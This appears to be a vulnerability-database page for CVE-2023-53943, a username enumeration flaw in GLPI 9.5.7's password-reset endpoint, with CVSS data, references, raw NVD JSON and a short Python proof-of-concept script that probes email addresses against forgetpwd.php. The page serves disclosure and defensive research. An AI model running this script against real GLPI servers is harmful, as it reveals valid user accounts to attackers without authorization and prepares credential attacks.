CVE-2023-53943

Description

GLPI 9.5.7 contains a username enumeration vulnerability in the lost password recovery mechanism that allows attackers to validate email addresses. Attackers can systematically test email addresses by submitting requests to the password reset endpoint and analyzing response differences to identify valid user accounts.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:9.5.7:*:*:*:*:*:*:* - VULNERABLE

GLPI 9.5.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2023-53943 GLPI Username Enumeration PoC import requests import sys target_url = "http://target-server/glpi" forget_password_url = f"{target_url}/forgetpwd.php" def check_email(email): """Check if email exists in GLPI via password reset endpoint""" data = { 'email': email, 'update': 'Update' } response = requests.post(forget_password_url, data=data) # Analyze response to determine if email exists if "sent" in response.text.lower() or "send" in response.text.lower(): return True # Email likely exists elif "not found" in response.text.lower() or "no account" in response.text.lower(): return False # Email does not exist return None # Unable to determine # Example usage test_emails = [ "[email protected]", "[email protected]", "[email protected]" ] for email in test_emails: exists = check_email(email) if exists: print(f"[+] Valid user found: {email}") elif exists is False: print(f"[-] No user: {email}") else: print(f"[?] Unknown: {email}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53943
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53943
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53943/
[4] VulDB https://vuldb.com/cve/CVE-2023-53943
[5] https://glpi-project.org/pt-br/
[6] https://www.exploit-db.com/exploits/51418
[7] https://www.vulncheck.com/advisories/glpi-username-enumeration-vulnerability-via-lost-password-endpoint
[8] https://www.exploit-db.com/exploits/51418

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53943", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:52.940", "lastModified": "2025-12-31T17:34:30.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI 9.5.7 contains a username enumeration vulnerability in the lost password recovery mechanism that allows attackers to validate email addresses. Attackers can systematically test email addresses by submitting requests to the password reset endpoint and analyzing response differences to identify valid user accounts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:9.5.7:*:*:*:*:*:*:*", "matchCriteriaId": "33DAB2AC-0B1F-4212-942B-574822C432E0"}]}]}], "references": [{"url": "https://glpi-project.org/pt-br/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51418", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/glpi-username-enumeration-vulnerability-via-lost-password-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51418", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}